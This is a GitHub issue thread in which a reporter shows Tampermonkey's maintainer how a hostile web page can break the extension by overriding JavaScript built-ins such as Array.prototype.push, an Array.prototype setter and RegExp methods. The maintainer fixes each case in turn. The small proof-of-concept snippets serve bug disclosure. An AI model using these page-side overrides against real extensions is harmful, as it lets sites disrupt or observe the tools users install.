### ISSUE TITLE
web page can break tampermonkey by replacing `Array.prototype.push`

### ISSUE THREAD

**Issue by xBZZZZ** [Tampermonkey/tampermonkey#1365]
1. install this userscript:
```javascript
// ==UserScript==
// @name        useless script
// @namespace   http://bzzzzdzzzz.blogspot.com/
// @description does nothing
// @author      BZZZZ
// @include     *
// @version     0.1
// @grant       none
// @run-at      document-end
// ==/UserScript==

undefined;
```
2. host this as html file on http server:
```html
<script>
var apush=Array.prototype.push;
Array.prototype.push=function(){
  document.write('<h1>open javascript console</h1>');
  console.log(this,arguments);
  return apush.apply(this,arguments);
};
</script>
```
3. open it in chromium
4. open javascript console

**Comment by derjanb** [comment]
Good catch!

**Comment by xBZZZZ** [comment]
> Good catch!

don't forget that web site can also do
```html
<script>
Object.defineProperty(Array.prototype,'0',{
  'set':function(val){
    console.log('%O [0] = %o',this,val);
    document.write('<h1>open javascript console</h1>');
    Object.defineProperty(this,'0',{
      'configurable':true,
      'enumerable':true,
      'writable':true,
      'value':val
    });
  }
});
</script>
```
(also breaks chromium devtools)

**Comment by derjanb** [comment]
Should be fixed at the latest BETA version. Thanks for reporting

**Comment by xBZZZZ** [comment]
now try
```javascript
<script>
RegExp.prototype.exec=console.trace;
</script>
```

**Comment by derjanb** [comment]
Should be fixed at 4.14.6148 (in review|[crx](https://tampermonkey.net/crx/tampermonkey_beta_4_14_6148.crx))

**Comment by xBZZZZ** [comment]
```html
<iframe src="/" name="theiframe"></iframe>
<script>
Object.defineProperty(theiframe.RegExp.prototype,"constructor",{
  "get":console.trace
});
</script>
```

**Comment by derjanb** [comment]
Should be fixed at 4.14.6149 (in review|[crx](https://tampermonkey.net/crx/tampermonkey_beta_4_14_6149.crx))
